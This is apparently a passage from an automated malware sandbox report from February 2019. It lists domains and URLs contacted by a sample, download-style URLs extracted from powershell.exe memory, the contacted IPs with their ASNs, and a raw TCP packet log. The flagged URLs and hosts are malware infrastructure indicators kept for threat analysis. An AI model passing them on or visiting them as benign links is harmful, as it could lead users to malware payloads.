borsacat.com	185.2.4.75	true	true	unknown
a767.dscg3.akamai.net	23.10.249.50	true	false	high
leonfurniturestore.com	184.175.67.101	true	false	unknown
www.leonfurniturestore.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://borsacat.com/9onrkqJ	true	Avira URL Cloud: safe	unknown
http://181.15.224.57/	false	Avira URL Cloud: safe	unknown
http://leonfurniturestore.com/sec.myacc.resourses.biz/	false	Avira URL Cloud: safe	unknown
http://borsacat.com/9onrkqJ/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://chileven.com/YAsyH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://fatrecipesdoc.com/I20clH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://borsacat.com	powershell.exe, 00000004.00000002.1667350886.01F78000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://chileven.com/YAsyS0Mslz	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://idjvn.com/eUH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	low
http://borsacat.com/9onrkqJ/H	powershell.exe, 00000004.00000002.1667350886.01F78000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://borsacat.com/9onrkqJH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://borsacat.com/9onrH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://borsacat.com/9onrkqH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://idjvn.com/eUBrJig7	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	low
http://fatrecipesdoc.com/I20cH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://chileven.com/YAsySH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://idjvn.H	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://borsacat.cH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://www.leonfurniturestore.com/sec.myacc.resourses.biz/	sec.myacc.resourses[1].htm.1.dr	false	Avira URL Cloud: safe	unknown
http://huyushop.comH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://fatrecipesdoc.com/I20clMx8H	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://huyushop.com/P2ryBfybD	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://borsacat.H	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://borsacat.comh%	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	low
http://idjvn.com/eUBrJH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	low
http://chileven.com/YAsyS0MslzH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://fatrecipesdoc.com/I20clMx8	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://huyushop.com/P2ryBfybDH	powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	ASN	ASN Name	Malicious
185.2.4.75	Italy	29550	SIMPLYTRANSITGB	true
181.15.224.57	Argentina	7303	TelecomArgentinaSAAR	false
184.175.67.101	United States	7393	CYBERCON-CYBERCONINCUS	false
184.101.191.86	United States	209	CENTURYLINK-US-LEGACY-QWEST-QwestCommunicationsCompany	false

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2019 20:12:32.337133884 CET	54991	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:32.350378036 CET	53	54991	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:33.425010920 CET	51176	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:33.453460932 CET	53	51176	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:33.470921993 CET	49222	80	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:33.472393036 CET	49223	80	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:34.736893892 CET	80	49223	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:34.737168074 CET	49223	80	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:34.738228083 CET	49223	80	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:34.891047001 CET	80	49223	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:34.893855095 CET	80	49223	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:34.893960953 CET	80	49223	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:34.894073009 CET	49223	80	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:34.894273043 CET	49223	80	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:34.936444998 CET	80	49222	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:34.936590910 CET	49222	80	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:34.960808992 CET	49810	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:35.000349998 CET	53	49810	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:35.001652956 CET	49224	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:35.010405064 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:35.044192076 CET	80	49223	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:35.147753954 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:35.147972107 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:36.264995098 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:36.403073072 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:36.409296036 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:36.409337044 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:36.409413099 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:36.409452915 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:36.409517050 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:36.428388119 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:36.567502022 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:36.567692995 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:36.893261909 CET	55151	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:36.896470070 CET	53216	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:36.906105042 CET	53	55151	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:36.924123049 CET	53	53216	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:36.938716888 CET	49792	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:36.972624063 CET	53	49792	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:37.461997032 CET	50672	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:37.509768009 CET	53	50672	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:37.520483017 CET	54414	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:37.556268930 CET	53	54414	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:38.073010921 CET	49224	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.199223042 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.209449053 CET	443	49224	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.209567070 CET	49224	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.209943056 CET	49224	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.346519947 CET	443	49224	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.346550941 CET	443	49224	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.346662998 CET	49224	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.347173929 CET	49224	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.377011061 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381496906 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381541967 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381571054 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381597996 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381628036 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381647110 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.381659031 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381690025 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381716013 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381725073 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.381747007 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381778955 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.381805897 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.383946896 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.404459000 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.519891977 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.519934893 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.519963980 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.520019054 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.520080090 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.520167112 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.520174980 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.520203114 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.520234108 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.520265102 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.520273924 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.520296097 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.520327091 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.520361900 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.520555973 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.520628929 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.523196936 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.523240089 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.523267031 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.523722887 CET	443	49224	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.523824930 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.661611080 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.661653996 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.661681890 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.661729097 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.661731958 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.661789894 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.661818981 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.661906958 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.661945105 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.662036896 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.662110090 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.662446022 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.662484884 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.662550926 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.662586927 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.662885904 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.662925005 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.662972927 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.662992001 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.663007975 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.663037062 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.663064957 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.663511038 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.802603006 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.802645922 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.802746058 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.802802086 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.802985907 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.803025961 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.803097963 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.803121090 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.803133965 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.803186893 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.803340912 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.803400993 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.804287910 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.804357052 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.804372072 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.804390907 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.804421902 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.804451942 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.804482937 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.804486990 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.804523945 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.804527044 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.804541111 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.804557085 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.804630995 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.804666042 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.804680109 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.804692984 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.945195913 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.945276022 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.945305109 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.945337057 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.945382118 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.945385933 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.945413113 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.945415974 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.945430994 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.946772099 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.946821928 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.946865082 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.946897984 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.946934938 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.946949005 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.946962118 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.946974039 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.947144032 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.947177887 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.947216034 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.947232008 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.947247028 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.947253942 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:38.947278976 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:38.947371006 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.085220098 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.085269928 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.085297108 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.085324049 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.085350990 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.086508989 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.086635113 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.531497955 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.645396948 CET	61734	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:39.648289919 CET	55067	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:39.658978939 CET	53	61734	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:39.669900894 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.669955969 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.669994116 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670030117 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670036077 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.670087099 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670118093 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670169115 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670172930 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.670213938 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670272112 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.670273066 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670305014 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670320034 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.670335054 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670365095 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670392990 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.670393944 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670424938 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670450926 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.670454979 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.670511961 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.670892954 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.675796986 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.676918983 CET	53	55067	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:39.808290958 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.808342934 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.808470964 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.808485985 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.808516026 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.808551073 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.808634043 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.808661938 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.808695078 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.809138060 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.809196949 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.809242010 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.809298992 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.809309959 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.809325933 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.809353113 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.809379101 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.809405088 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.809431076 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.809480906 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.810667038 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.845415115 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.946796894 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.946876049 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.946904898 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.946928978 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:12:39.946960926 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:39.947792053 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:40.152353048 CET	49225	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:12:40.289781094 CET	443	49225	184.175.67.101	192.168.1.16
Feb 12, 2019 20:13:01.806658983 CET	64117	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:13:01.853526115 CET	53	64117	8.8.8.8	192.168.1.16
Feb 12, 2019 20:13:01.888464928 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:01.919332027 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:01.919459105 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:01.920069933 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:01.951787949 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:01.956264973 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:01.958029032 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.006755114 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.006795883 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.006824970 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.006850958 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.006876945 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.006905079 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.006923914 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.006933928 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.006968021 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.006985903 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.007011890 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.007082939 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.038960934 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039000988 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039016962 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039047003 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039062023 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039077997 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039097071 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039112091 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039125919 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039176941 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039194107 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.039225101 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.039902925 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.076041937 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.076087952 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.076107979 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.076124907 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.076138973 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.076277971 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.076328039 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.076358080 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.076384068 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.076411009 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.107306957 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.107333899 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.107351065 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.107412100 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.107464075 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.107503891 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.107542992 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.107566118 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.107580900 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.107589960 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.107599020 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.107717037 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.107765913 CET	49231	80	192.168.1.16	185.2.4.75
